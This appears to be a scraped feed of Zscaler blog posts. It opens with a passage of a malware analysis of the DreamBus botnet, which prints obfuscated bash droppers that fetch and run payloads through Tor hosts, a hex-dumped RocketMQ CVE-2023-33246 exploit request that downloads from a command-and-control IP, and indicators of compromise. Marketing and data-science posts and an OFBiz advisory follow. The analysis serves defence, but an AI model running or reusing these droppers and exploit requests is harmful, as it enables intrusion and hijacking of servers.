@/tmp/.json%s %s:%d/api/setup/validate &>/dev/null;rm -f /tmp/.json%s
If the exploit is successful, the following bash script will download and execute the DreamBus main module:
exec &>/dev/null
LHjFgxtn=./.$(date|md5sum|head -c20)
uPXAiDgp=(doh-ch.blahdns.com doh-de.blahdns.com doh-jp.blahdns.com
doh-sg.blahdns.com doh.li doh.pub doh.dns.sb dns.twnic.tw)
AcCQYgCy="/tmp/systemd-private-de2381ccba8aa44b77bda1c971a33b5e-system
d-logind.service-vkHzrg"
VdHfWQsU="curl -m60 -fsSLkA- --doh-url
https://${uPXAiDgp[$((RANDOM%${#uPXAiDgp[@]}))]}/dns-query"
JtkrXMaj="curl -m60 -fsSLkA-"
MTWuGlJu="relay.tor2socks.in"
PcSKnocJ="ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad"
PATH=/tmp:$AcCQYgCy:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin
:/usr/local/sbin:$PATH
jJcSNhfn() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nUser-Agent: -\r\nHost:
${HOST}\r\n\r\n" >&3
(while read line; do
[[ "$line" == $'\r' ]] && break
done && cat) <&3
exec 3>&-
}
wtJymANw() {
for i in $AcCQYgCy . /usr/bin /var/tmp /tmp ;do echo exit > $i/i
&& chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}
OUneYJaz() {
beKjoWyW=/exec
yXCmWOnw=mb0_$(curl -4 ident.me||curl -4 ip.sb)_$(whoami)_$(uname
-n)_$(uname -r)_$(cat /etc/machine-id||(ip r||hostname -i||echo
no-id)|md5sum|awk NF=1)
$VdHfWQsU -x socks5h://$MTWuGlJu:9050 -e$yXCmWOnw
$PcSKnocJ.onion$beKjoWyW -o$LHjFgxtn || $VdHfWQsU -e$yXCmWOnw
$1$beKjoWyW -o$LHjFgxtn || $JtkrXMaj -x socks5h://$MTWuGlJu:9050
-e$yXCmWOnw $PcSKnocJ.onion$beKjoWyW -o$LHjFgxtn || $JtkrXMaj
-e$yXCmWOnw $1$beKjoWyW -o$LHjFgxtn
}
ZVdmcgjf() {
chmod +x $LHjFgxtn;$LHjFgxtn;rm -f $LHjFgxtn
}
RAKjFxFv() {
u=$PcSKnocJ.tor2web.re/load/
cd /tmp && curl -V || (jJcSNhfn http://$u/cu) | tar zxp
wtJymANw
OUneYJaz $PcSKnocJ.tor2web.re ||
OUneYJaz $PcSKnocJ.tor2web.in ||
OUneYJaz $PcSKnocJ.tor2web.it
ZVdmcgjf
}
ls /proc/$(head -1 /tmp/.systemd.1)/maps || RAKjFxFv
rm -f /home/user/.bash_history
Apache RocketMQ Exploit Module (CVE-2023-33246)
Apache RocketMQ is an open source distributed messaging and streaming platform that was originally created by Alibaba in 2012. In June 2023, a vulnerability cataloged as CVE-2023-33246 was discovered that enables an attacker to achieve remote command execution (RCE) on RocketMQ versions 5.1.0 and earlier. Shortly after, DreamBus added an exploit module to target this vulnerability.
The DreamBus RocketMQ exploit module scans for vulnerable servers on port 10911 by sending the following request to a target server:
00000000 00 00 00 c8 00 00 00 60 7b 22 63 6f 64 65 22 3a |.......`{"code":|
00000010 32 35 2c 22 66 6c 61 67 22 3a 30 2c 22 6c 61 6e |25,"flag":0,"lan|
00000020 67 75 61 67 65 22 3a 22 4a 41 56 41 22 2c 22 6f |guage":"JAVA","o|
00000030 70 61 71 75 65 22 3a 30 2c 22 73 65 72 69 61 6c |paque":0,"serial|
00000040 69 7a 65 54 79 70 65 43 75 72 72 65 6e 74 52 50 |izeTypeCurrentRP|
00000050 43 22 3a 22 4a 53 4f 4e 22 2c 22 76 65 72 73 69 |C":"JSON","versi|
00000060 6f 6e 22 3a 33 39 35 7d 66 69 6c 74 65 72 53 65 |on":395}filterSe|
00000070 72 76 65 72 4e 75 6d 73 3d 31 0a 72 6f 63 6b 65 |rverNums=1.rocke|
00000080 74 6d 71 48 6f 6d 65 3d 2d 63 20 24 40 7c 73 68 |tmqHome=-c $@|sh|
00000090 20 2e 20 65 63 68 6f 20 63 75 72 6c 20 2d 66 73 | . echo curl -fs|
000000a0 53 6b 4c 41 2d 20 39 32 2e 32 30 34 2e 32 34 33 |SkLA- 92.204.243|
000000b0 2e 31 35 35 3a 38 30 38 30 2f 72 6f 6b 65 74 20 |.155:8080/roket |
000000c0 2d 6f 20 72 65 6b 65 74 65 64 3b 0a |-o reketed;.|
The first 4 bytes of the packet is the full message size (big endian), followed by 4 bytes for the size of the command (also big endian) within the curly braces. The code value 25 is used to call an update configuration function that is invoked without properly validating whether the client has the necessary permissions. As a result, an unauthenticated attacker can update the broker configuration file and most importantly the rocketmqHome variable to execute arbitrary commands. In this instance, the DreamBus module is setting the rocketmqHome variable in the configuration to the value:
-c $@|sh . echo curl -fsSkLA- 92.204.243.155:8080/roket -o reketed;
If the RocketMQ server is vulnerable, this shell command will use curl to download a malicious bash script and write it to a file named reketed. Example content of this script is shown below:
z3glwn;rm -f reketed
exec &>/dev/null
BDrFYzWg=./.$(date|md5sum|head -c20)
qyynvpBQ=(doh-ch.blahdns.com doh-de.blahdns.com doh-jp.blahdns.com
doh-sg.blahdns.com doh.li doh.pub doh.dns.sb dns.twnic.tw)
sNHouYjx="/tmp/systemd-private-ae776206422e886961eefb358c4fefda-system
d-logind.service-z3glwn"
GRPoNTxD="curl -m60 -fsSLkA- --doh-url
https://${qyynvpBQ[$((RANDOM%${#qyynvpBQ[@]}))]}/dns-query"
ZwJtGQaC="curl -m60 -fsSLkA-"
HNPDsmwz="relay.tor2socks.in"
HyMbvhNq="ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad"
PATH=/tmp:$sNHouYjx:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin
:/usr/local/sbin:$PATH
eGiAsomX() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nUser-Agent: -\r\nHost:
${HOST}\r\n\r\n" >&3
(while read line; do
[[ "$line" == $'\r' ]] && break
done && cat) <&3
exec 3>&-
}
bCQYhArV() {
for i in $sNHouYjx . /usr/bin /var/tmp /tmp ;do echo exit > $i/i
&& chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}
XNSBjYOO() {
HoVCQHFu=/exec
LouMQEck=rq1_$(curl -s4 ident.me||curl -4
ip.sb)_$(whoami)_$(uname -n)_$(uname -r)_$(cat /etc/machine-id||(ip
r||hostname -i||echo no-id)|md5sum|awk NF=1)
$GRPoNTxD -x socks5h://$HNPDsmwz:9050 -e$LouMQEck
$HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $GRPoNTxD -e$LouMQEck
$1$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC -x socks5h://$HNPDsmwz:9050
-e$LouMQEck $HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC
-e$LouMQEck $1$HoVCQHFu -o$BDrFYzWg
}
MPQKanDg() {
chmod +x $BDrFYzWg;$BDrFYzWg;rm -f $BDrFYzWg
}
dtOFCAtT() {
u=$HyMbvhNq.tor2web.it/load/
cd /tmp && curl -V || (eGiAsomX http://$u/cu) | tar zxp
bCQYhArV
XNSBjYOO $HyMbvhNq.tor2web.it ||
XNSBjYOO $HyMbvhNq.tor2web.in ||
XNSBjYOO $HyMbvhNq.tor2web.re
MPQKanDg
}
ls /proc/$(head -1 /tmp/.systemd.1)/maps || dtOFCAtT
The DreamBus RocketMQ exploit module checks for the string opaque in the response to determine whether the exploit was successful. If the exploitation attempt was successful, the module then sends the following request to the RocketMQ server to execute the bash script:
00000000 00 00 00 a2 00 00 00 60 7b 22 63 6f 64 65 22 3a |.......`{"code":|
00000010 32 35 2c 22 66 6c 61 67 22 3a 30 2c 22 6c 61 6e |25,"flag":0,"lan|
00000020 67 75 61 67 65 22 3a 22 4a 41 56 41 22 2c 22 6f |guage":"JAVA","o|
00000030 70 61 71 75 65 22 3a 30 2c 22 73 65 72 69 61 6c |paque":0,"serial|
00000040 69 7a 65 54 79 70 65 43 75 72 72 65 6e 74 52 50 |izeTypeCurrentRP|
00000050 43 22 3a 22 4a 53 4f 4e 22 2c 22 76 65 72 73 69 |C":"JSON","versi|
00000060 6f 6e 22 3a 33 39 35 7d 66 69 6c 74 65 72 53 65 |on":395}filterSe|
00000070 72 76 65 72 4e 75 6d 73 3d 31 0a 72 6f 63 6b 65 |rverNums=1.rocke|
00000080 74 6d 71 48 6f 6d 65 3d 2d 63 20 24 40 7c 73 68 |tmqHome=-c $@|sh|
00000090 20 2e 20 65 63 68 6f 20 62 61 73 68 20 72 65 6b | . echo bash rek|
000000a0 65 74 65 64 3b 0a |eted;.|
The bash script will then download and execute the main DreamBus module.
Conclusion
DreamBus continues to pose a threat to organizations with brute force attacks against PostgreSQL, SSH, and Redis along with new exploits that target recent vulnerabilities in popular business applications. Zscaler ThreatLabz recommends that organizations properly secure all applications that are both publicly and privately accessible. Strong passwords and multi-factor authentication (MFA) should always be used to secure internet services, and SSH public key authentication can be further strengthened by requiring a password to decrypt the private key. Organizations should also deploy network and endpoint monitoring systems to identify potential compromises.
Zscaler Coverage
Zscaler’s multilayered cloud security platform detects indicators at various levels, as shown below:
ELF32.Coinminer.DreamBus
ELF32.Coinminer.XMRig
Linux.Worm.SSHSpreader
Indicators of Compromise (IOCs)
The following IOCs can be used to detect a DreamBus infection.
Samples
SHA256 Hash
Module Name
cd647d4497661bf0a7f9a11fd5ca84d52
f49d4cca74941a31cf631c8f6bc88d2
DreamBus PostgreSQL module
5d1721d4d362ddcdbd0762eccdb4e07b0
cc1c26c7d69da30e024e70c7063c519
DreamBus Redis module
9f49375ae05c16d80e02c21f178429602
f726ce87295b9dfd9458f37956392e3
DreamBus Metabase module
25d7b17521629f0861113b1e9f7653dc1
9c40b1d8f3de685ba29108a0d9fa7aa
DreamBus Hadoop Yarn module
34603862c5086a9063e42d79fb094e8d8
9e3aeef6f8eadf23c6925c6a4201a9c
DreamBus Hashicorp Consul module
b86fa919ab9ebaa3f8ead4f7ef6ee0bb9
4a3a1b7d9583e99598893f2738a1c71
DreamBus RocketMQ module
e52b70a76e382ffd2aff02d1d26269036
c589676ba1f2086051c11cb7997a5a5
DreamBus SSH module
5a55acdae38219411b2f3350db425d888
3d6238e465d07a71cadfe89877df6ac
DreamBus XMRig miner
Network indicators
Domain/IP Address
Description
ru6r4inkaf4thlgflg4iqs5mhqwqubols
5qagspvya4whp3dgbvmyhad[.]onion
DreamBus C2 domain
139.59.150[.]7
DreamBus C2 IP address
92.204.243[.]155
DreamBus C2 IP address
p2pool[.]it
DreamBus Monero mining pool
Host indicators
Filenames
Description
/tmp/.systemd.3
DreamBus module lock file
/tmp/.json[ipaddress]
DreamBus Metabase exploit staged payload file
Password lists
SSH
PostgreSQL and Redis (the same password list is currently used for both applications)
Thu, 11 1月 2024 08:30:01 -0800Brett Stone-Grosshttps://www.zscaler.jp/blogs/security-research/dreambus-unleashes-metabase-mayhem-new-exploit-moduleDigital Experience Monitoring Predictions for 2024
https://www.zscaler.jp/blogs/product-insights/digital-experience-monitoring-predictions-2024
In 2023, we’ve seen an increase in companies focused on maximizing growth as it relates to productivity and innovation. Employers were looking to optimize employee experiences and reduce costs in hopes of driving increased revenues. According to Great Place To Work, 2023 revenue per employee for Fortune 100 Best Companies increased by 7% YoY, up from 4% from 2022.
Revenue per employee increased in 2023
To ensure great employee productivity, companies need secure and fast application and data access from home, hotels, airports, and the office. This is confirmed by Hyatt’s recent earnings where they saw a 2x increase as travel surged, compared to pandemic levels. These trends continue to push IT teams to support employees as they securely access SaaS, public, and private cloud applications, (e.g., Salesforce.com, SAP, Microsoft Office 365, ServiceNow) from anywhere.
Globally distributed enterprise is today’s reality
However, if organizations continue to leverage legacy network architectures that rely on VPNs and firewalls, they are more susceptible to attacks. These technologies expand an organization's attack surface as they place users directly on a routable network. In a recent VPN risk report, 45% of organizations confirmed experiencing at least one attack that exploited VPN vulnerabilities in the last year. Of those, one in three became victims of VPN-related ransomware attacks. Security does not have to be a tradeoff for fast and reliable access.
In a recent post, we analyzed the last 12 months of conversations with hundreds of IT professionals about their employee experience and they reported similar findings; that they lack visibility into Wi-Fi and ISP networks. Their current tools struggle to consolidate device, network, and application details such as system processes, memory, CPU, network latencies, packet loss across network hops, and application response times (DNS, SSL handshake, HTTP/TCP connect).
IT must secure and optimize experiences even when networks are out of their control. Businesses continue to rethink their digital transformation journey to ensure a flawless end user experience while securing users, workloads, and devices over any network, anywhere. As both travel and revenue per employee increases, employers are learning how to optimize costs and employee productivity across the board.
As we kick off 2024, one thing is clear: understanding how employee experience can impact revenue as a driving force to increasing profits is key.
To aid IT teams, organizations need a better path forward, one that is designed with security and optimized end user experience driven by actionable AI.
As organizations look forward to 2024, three top digital experience monitoring trends emerge:
Zero trust growth will require integrated digital experience monitoring (DEM)
AIOps is a requirement, not a “nice to have,” to reduce mean time to resolution
Reduce overall IT costs
Zero trust growth will require integrated DEM
As organizations look to secure their environments leveraging zero trust architectures, they need an integrated digital experience monitoring solution to ensure flawless end user experience no matter where they are located. As we found in our customer conversations, many organizations fail to gain insights into zero trust environments with existing monitoring solutions. They also lack full end-to-end visibility such as last-mile ISP and Wi-Fi insights. Adding to the complexity, managing and correlating data across multiple tools for device, network, and application is time-consuming and frustrating to the end user.
Zero trust solutions must include DEM by simplifying deployment through a single agent that combines security and monitoring. Monitoring insights should include device metrics (CPU, memory, disk, network bandwidth), network metrics (hop-by-hop latencies, packet loss, jitter, MOS scores, DNS times), application response times (TCP Connect, SSL handshake, HTTP Connect, TTFB, TTLB times), with intuitive correlation to help service desk and network operations teams
AIOps is a requirement, not a “nice to have,” to reduce mean time to resolution (MTTR)
As we’ve seen in 2023, generative AI has completely changed the industry, and we’ve seen new applications emerge that create data at exponential rates. We are only scratching the surface of the potential with these apps. Much of this data may not be seen by humans. However, insights from this data could be critical for organizations. Organizations may access thousands of SaaS-based applications to create solutions (e.g., images, text, code) to increase productivity. As these applications become critical for organizations, they must ensure their availability.
For example, talking to a manufacturing company, they shared how they leverage generative AI to decrease the time required to produce website content. They take hand-drawn images and upload them into a generative AI solution to create hundreds of images based on different scenarios. This typically takes months, but it now takes minutes and frees up their team to think more strategically.
However, to gain efficiency, IT must play many roles regarding the security and availability of these applications. Beyond the guardrails required, IT must ensure employees have access to the tools the business needs, which adds to the cost and complexity. Monitoring these new SaaS applications wherever the user connects will keep employees productive. As organizations look to increase employee productivity, security, network, and service desk, teams must collaborate closely to ensure excellent end user experiences.
Providing meaningful insights for all the IT teams requires relevant data. Zero trust monitoring solutions must have machine learning models based on years of data across millions of telemetry points to be effective. As data is collected, these models must adapt and learn based on end user feedback to efficiently identify the root cause of issues.
There are three key areas IT teams need to consider:
Proactively identify recurring issues before users are impacted. For example, if a certain Wi-Fi router shows repeated issues, network teams can work with service desk teams and end users to proactively replace Wi-Fi routers so end users continue to have great access.
Empower service desk teams to either resolve issues or escalate with confidence. For example, if an end user complains about an SAP issue, the service desk team must know a potential root cause in seconds, and route it to the appropriate L3 team. They will need an intuitive AI solution to identify the issue in seconds and share those insights.
Drive increased monitoring intelligence with continuous updates to machine learning models. Zero trust monitoring solutions must expand monitoring vantage points and collect new insights to aid IT teams.
Reduce overall IT costs
As we’ve seen in 2023, macroeconomics are forcing organizations to think about maximizing productivity and profits. In 2023, many organizations have started their journey to zero trust solutions, and are ready to embark on integrating their security and monitoring stacks. In 2024, we’ll see leaders at these organizations ask tough questions around monitoring zero trust environments without adding complexity to their IT architectures. This will set organizations apart, as ones that have the right zero trust architecture will have included monitoring as part of the journey. Not only will it provide better insights for network operations and service desk teams, it will lower overall IT costs. They will be able to retire siloed monitoring solutions to reduce costs and gain better insights.
For example, if service desk, desktop, network, and application teams all leveraged the same monitoring solution, they could confidently provide IT leaders with key insights and remove finger pointing, which still occurs as teams hardly look at the same datasets. IT leaders will want a consolidated monitoring stack to answer the following questions:
What’s the root cause of Zoom, Teams, and Webex call quality issues and how do I correlate it to the end user’s device, network, and application?
We leverage VPNs for private applications and experience application slowness. How do I identify if it’s the device’s CPU or one of the hops in the network?
My users blame security for application slowness. How can we quickly verify it’s not?
As we saw in 2023, organizations want to leverage existing IT investments where possible. Apart from consolidating their monitoring silos, in 2024, organizations will want to leverage existing ticketing systems. To do so, zero trust monitoring solutions must take AI-powered insights and push them into where service desk and network operations teams live. For example, many organizations have ServiceNow workflows, and smart integrations will provide IT teams with key insights to resolve issues in minutes.
Summary
As IT teams start planning 2024, it's key to find digital experience monitoring solutions that effectively support the hybrid workforce, leverage AI-assistance, and drive overall IT lower costs. As you embark on your 2024 initiatives, consider Zscaler's Digital Experience monitoring solution. Please don't take our word for it. See what our customers are saying:
“15 minutes to resolve user experience issues, down from 8 hours” Jeremy Bauer, Sr. Director Information Security, Molson Coors Beverage Company
“Zscaler helps us identify the issues that need to be addressed before they cause disruption to AMN users, so we can ensure a seamless experience from anywhere.” Mani Masood, Head of Information Security, AMN Healthcare
“When I open my computer, it doesn't matter if I'm in California, Arizona, Nevada, or across the globe, I get the same experience and the same level of protection.” David Petroski, Senior Infrastructure Architect, Southwest Gas
Interested to learn more about ensuring great digital experiences in 2024? Click here for Zscaler’s perspectives. This blog is part of a series of blogs that look ahead to what 2024 will bring for key areas that organizations like yours will face. The next blog in this series covers hybrid work predictions for 2024.
Forward-Looking Statements
This blog contains forward-looking statements that are based on our management's beliefs and assumptions and on information currently available to our management. The words "believe," "may," "will," "potentially," "estimate," "continue," "anticipate," "intend," "could," "would," "project," "plan," "expect," and similar expressions that convey uncertainty of future events or outcomes are intended to identify forward-looking statements. These forward-looking statements include, but are not limited to, statements concerning: predictions about the state of the cyber security industry in calendar year 2024 and our ability to capitalize on such market opportunities; anticipated benefits and increased market adoption of “as-a-service models” and Zero Trust architecture to combat cyberthreats; and beliefs about the ability of AI and machine learning to reduce detection and remediation response times as well as proactively identify and stop cyberthreats. These forward-looking statements are subject to the safe harbor provisions created by the Private Securities Litigation Reform Act of 1995. These forward-looking statements are subject to a number of risks, uncertainties and assumptions, and a significant number of factors could cause actual results to differ materially from statements made in this blog, including, but not limited to, security risks and developments unknown to Zscaler at the time of this blog and the assumptions underlying our predictions regarding the cyber security industry in calendar year 2024.
Risks and uncertainties specific to the Zscaler business are set forth in our most recent Quarterly Report on Form 10-Q filed with the Securities and Exchange Commission (“SEC”) on December 7, 2022, which is available on our website at ir.zscaler.com and on the SEC's website at www.sec.gov. Any forward-looking statements in this release are based on the limited information currently available to Zscaler as of the date hereof, which is subject to change, and Zscaler does not undertake to update any forward-looking statements made in this blog, even if new information becomes available in the future, except as required by law.
Tue, 09 1月 2024 08:00:01 -0800Rohit Goyalhttps://www.zscaler.jp/blogs/product-insights/digital-experience-monitoring-predictions-2024Apache OFBiz Authentication Bypass Vulnerability (CVE-2023-51467)
https://www.zscaler.jp/blogs/security-research/apache-ofbiz-authentication-bypass-vulnerability-cve-2023-51467
Introduction
On December 26, 2023, researchers at SonicWall announced the discovery of a zero-day security flaw in Apache OFBiz. Tracked as CVE-2023-51467, the vulnerability allows threat actors to bypass authentication and perform a Server-Side Request Forgery (SSRF). CVE-2023-51467 earned a critical CVSS score of 9.8. According to researchers at SonicWall, a patch released for another vulnerability, CVE-2023-49070, left the initial issue unresolved, making authentication bypass possible.
Recommendations
Zscaler ThreatLabz strongly advises users of Apache OFBiz software to promptly upgrade to version 18.12.11, as this version contains crucial fixes to mitigate the identified security vulnerability (CVE-2023-51467).
Affected Versions
The following versions of Apache OFBiz are affected by the disclosed vulnerabilities and should be updated immediately:
All versions 18.12.10 and below are impacted by CVE-2023-51467
All versions 18.12.9 and below are impacted by CVE-2023-49070
Background
Apache OFBiz is an open-source Enterprise Resource Planning (ERP) system that provides business solutions for various industries. This includes tools to manage operations like customer relationships, order processing, human resource functions, and warehouse management.
On December 4, 2023, Apache released a patch to fix CVE-2023-49070. For this fix, Apache removed the XMLRPC endpoint and the OFBiz XMLRPC library, which was not maintained regularly. However, this fix didn’t resolve the root cause of CVE-2023-49070.
While validating the fix for CVE-2023-49070, researchers from SonicWall bypassed authentication in the newly fixed version of Apache OFBiz, leading to CVE-2023-51467.
How It Works
A threat actor sends an HTTP request to exploit a flaw in the checkLogin function. When null or invalid username and password parameters are supplied and the requirePasswordChange parameter is set to Y in the URI, the checkLogin function fails to validate the credentials, leading to authentication bypass. This occurs because the program flow circumvents the conditional block meant to check the username and password fields. By manipulating login parameters, threat actors can achieve Remote Code Execution (RCE) on a target server.
Zscaler Best Practices
Safeguard crown jewel applications by limiting lateral movement using Zscaler Private Access™ with application security modules turned on.
Route all server traffic through Zscaler Private Access™ with the application security module enabled and Zscaler Internet Access™, which provides visibility to identify and stop malicious activity from compromised systems/servers.
Turn on Zscaler Advanced Threat Protection™ to block all known command-and-control domains — thereby adding another layer of protection if an attacker exploits this vulnerability to implant malware.
Extend command-and-control (C2) protection to all ports and protocols with Zscaler Cloud Firewall™ (Cloud IPS module), including emerging C2 destinations. Doing so provides additional protection if the attacker exploits this vulnerability to implant malware.
Use Zscaler Cloud Sandbox™ to prevent unknown malware delivered as part of a second-stage payload.
Inspect all TLS/SSL traffic and restrict traffic to critical infrastructure from an allowed list of known-good destinations.
Conclusion
Apache OFBiz systems should promptly be updated to version 18.12.11. Failing to do so leaves systems vulnerable to CVE-2023-51467, allowing threat actors to manipulate login parameters and execute arbitrary code on the target server.
Zscaler Coverage
The Zscaler ThreatLabz team has deployed the following.
Zscaler Advanced Threat Protection
APP.EXPLOIT.CVE-2023-49070
APP.EXPLOIT.CVE-2023-51467
Zscaler Private Access AppProtection
6000751 - Apache OFBiz XMLRPC Insecure Deserialization (CVE-2023-49070)
6000753 - Apache OFBiz Auth Bypass and Code Injection (CVE-2023-51467)
For more details, visit the Zscaler Threat Library.
References
https://blog.sonicwall.com/en-us/2023/12/sonicwall-discovers-critical-apache-ofbiz-zero-day-authbiz/
https://threatprotect.qualys.com/2023/12/27/apache-ofbiz-authentication-bypass-vulnerability-cve-2023-51467/
https://lists.apache.org/thread/9tmf9qyyhgh6m052rhz7lg9vxn390bdv
Mon, 08 1月 2024 09:01:05 -0800Nishant Guptahttps://www.zscaler.jp/blogs/security-research/apache-ofbiz-authentication-bypass-vulnerability-cve-2023-51467How the Zscaler Zero Trust Exchange Makes Divestiture Seamless, Easy, and Secure for XPO and Its Spinoffs
https://www.zscaler.jp/blogs/customer-stories/how-zscaler-zero-trust-exchange-makes-divestiture-seamless-easy-and-secure
When thinking about logistics and the trucking industry in particular, technology probably isn’t the first association that comes to mind. While trucking has been around since shortly after the advent of the Model T in 1905, it hasn’t had the level of technological disruption and innovation that we’ve seen in other industries. But that’s changing rapidly.
Digital transformation in the logistics industry
Logistics and freight transportation is essentially a network business. I compare it to Uber because Uber is a network business, too. It matches customers who want to go to a particular destination with drivers. Just as technology has transformed passenger transportation, it is also transforming freight transportation by increasing freight network efficiency through the use of artificial intelligence and other advanced tools.
Even so, the industry isn’t yet fully digitized. For example, much of sales and customer operations work is done—for lack of better words—in an old-school way. We still have customer service representatives across Asia, South America, and Europe who make and receive phone calls as they manage pickup and delivery schedules, routing, dispatching, and billing.
Here at XPO, we’re working to optimize and support these customer service representatives with technology designed for a distributed world. Digital transformation is happening, and we are on a fast track to becoming a 100% cloud company. In fact, our CEO was previously our CIO. That should tell you about the direction we are headed as a company and where we see the industry going in the not-too-distant future.
XPO is investing heavily in technology. By the end of next year, we plan to completely shut down our data centers and become a 100% cloud company. As part of that cloud transformation, XPO deployed the Zscaler Zero Trust Exchange to meet our need for a security service edge (SSE). Zscaler not only satisfied our intended use cases, but also provided a number of unforeseen benefits.
Divestitures made simpler
In the relatively recent past, XPO was a big conglomerate with close to $30 billion in revenue and over 100,000 employees in 30 countries. In 2022, XPO sold its intermodal division, which provided rail brokerage and drayage services to 48 locations, to STG Logistics. Since then, STG has divested into a number of smaller companies, two of which went public almost immediately after the divestitures: RXO Logistics and GXO Logistics.
It was clear to us prior to deployment how a cloud native zero trust platform would be used to onboard and federate an acquired company by providing immediate and secure availability and access to the company’s applications instead of requiring cumbersome network integrations. What was less obvious to us was how this platform would make the process of divestiture easier as well. But it certainly did. Here are the benefits we experienced from having Zscaler in place throughout the divestitures at XPO:
No transition pains
Zscaler Internet Access enabled segmentation of public SaaS applications based on user identity. We were able to simply deploy Zscaler policies and segment the users from there. We went from more than 100,000 people to 38,000 people with zero friction.
No change in security posture
You can imagine that, when divestitures are on the horizon, there are a lot of distractions. As a result, things could fall through the cracks in terms of security. But with Zscaler, we maintained comprehensive security against cyberattacks and data loss, so our security and risk posture did not suffer one bit throughout the divestiture process.
No dip in productivity
Business continuity was another benefit of having Zscaler in place during divestitures. In similar situations in the past, I’ve had to hire a dedicated security team to handle the activities of segmenting the environments. This time, I didn’t have to hire anyone. It was a seamless transition, with no impact on productivity.
No interruptions in availability
To provide perspective, XPO moves between 50,000 and 60,000 pieces of freight every day. We use off-the-shelf SaaS applications for things like finance and HR, but the core system we use for operations is proprietary technology that uses machine learning to optimize routes, onboard customers, and make real-time rate adjustments. As you can imagine, availability is everything in our business.
If we were to be down for even a single day, the problems would multiply exponentially, so the ability to access our systems is critical. Before Zscaler, outages were all too frequent and user productivity was impacted by VPN and network disruptions in various locations. With Zscaler, we never have to worry about the network edge anymore, and this is something I can’t even begin to put a value on.
The power of the platform
Looking back, the only thing I would have done differently is deployed more of the capabilities of the Zero Trust Exchange up front to really leverage its power. For instance, I wish that we’d had Zscaler Private Access (ZPA) during the divestitures because it would have made it easier to segment the networks of internal apps versus external apps. With that said, deploying ZPA is at the top of our to-do list now.
Given the complexity of the typical divestiture process and all the things that could have gone wrong that didn’t, I feel that having Zscaler in place was a huge part of that success story.
Read the case study to learn more about how XPO is benefitting from the Zscaler zero trust platform.
Fri, 12 1月 2024 08:15:01 -0800Peeyush Patelhttps://www.zscaler.jp/blogs/customer-stories/how-zscaler-zero-trust-exchange-makes-divestiture-seamless-easy-and-secureData validation on production for unsupervised classification tasks using a golden dataset
https://www.zscaler.jp/blogs/product-insights/data-validation-production-unsupervised-classification-tasks-using-golden
Abstract
Have you ever been working on an unsupervised task and wondered, “How you I validate my algorithm at scale?”
In unsupervised learning, in contrast to supervised learning, our validation set has to be manually created and checked by us, i.e. we will have to go through the classifications ourselves and measure the classification accuracy or some other scores. The problem with manual classification is the time, effort, and work that is required for classifications, but this is the easy part of the problem.
Let’s assume that we developed an algorithm and tested it very well while manually passing on all the classifications, what about future changes to that algorithm? After every change we should check the classifications manually ourselves again. While the data classified might change with time, it might also grow to huge scales with the evolution of our product, and the growth of our customers, then our manual classification problem would of course be much more difficult.
Have you started to worry about your production algorithms already? Well, you shouldn’t!
After reading this, you will be familiar with our proposed method to validate your algorithm score easily, adaptively, and effectively against any change in the data or the model.
So let's start detailing it from the beginning.
Why is it needed?
Algorithm continuous modifications always happen. For example, we are having:
Runtime optimizations
Model improvements
Bug fixes
Version upgrades
How are we dealing with those modifications? We usually use QA tests to make sure the system keeps working. At the same time, the best among us might even develop some regression tests to make sure, for several constant scenarios, that the classifications would not be changed
What about data integrity?
But what about the real classifications on prod? Who verifies their change? We need to make sure that we won’t have any disasters on prod when deploying our new changes in the algorithm.
For that, we have two optional solutions:
Naive solution - pass through all the classifications on prod (which is of course not possible)
Practical solution - use samples of each customer data on prod - using the margin of error equation.
Margin of error
To demonstrate, we are going to take a constant sample from each customer’s data, which would represent the real distribution of the data with minimal deviation, which we will do using the Margin of Error equation, sometimes known from election surveys, where the surveys are sometimes based on some equation derived from the Margin of Error equation.
So, how does it work?
We can use the first equation used for calculating the margin of error, to extract the needed sample size desired.
We would like to have a maximum margin of error of 5%, while we should use a constant value of Z = 1.96 if we want the confidence of 95% (might be changed if we would like to have another confidence level)
The extraction of the required sample size is demonstrated in the following equation:
While this equation is an expansion of the equation above, it might be used when we have the full data size, to be more precise. Otherwise, we’ll be left only with the numerator of that equation - which is also fine if we don’t have the full data size.
This is a code block demonstrating the implementation of this equation in Python:
We can now freeze those samples, which we call a “golden dataset,” and use them as a supervised dataset that will be used by us in the future when making modifications, and serves us as a data integrity validator on real data from prod.
We should mention that because optional changes on prod data might happen with time, we encourage you to update this golden dataset from time to time.
The flow of work for end-to-end data integrity:
Manual classification to create a golden dataset
Maintaining a constant baseline of prod classifications
Developing a suite of score comparison tests
Integrating quality check into CI-process of the algorithm
So, how will it all work together? You can see that in the following GIF:
We may now push any change to our algorithm code, and remain protected, thanks to our data integrity shield!
For further questions about data integrity checks, or data science in general, don’t hesitate to reach out to me at [email protected].
Fri, 05 1月 2024 14:41:10 -0800Eden Meyuhashttps://www.zscaler.jp/blogs/product-insights/data-validation-production-unsupervised-classification-tasks-using-goldenData Protection Predictions for 2024
https://www.zscaler.jp/blogs/product-insights/data-protection-predictions-2024
As IT teams reflect on 2023 and look forward to 2024, we can all agree that data is the lifeblood of an organization. To that end, every organization’s goal should be to have visibility and control of data, wherever it’s created, shared, and accessed. New cloud apps, GenAI, remote work, and advanced collaboration approaches are driving a greater need to centralize protection controls and analytics as well as increase efficiency.
Without further ado, here are five predictions on how this will come together in 2024.
1. SaaS data gets a new protector
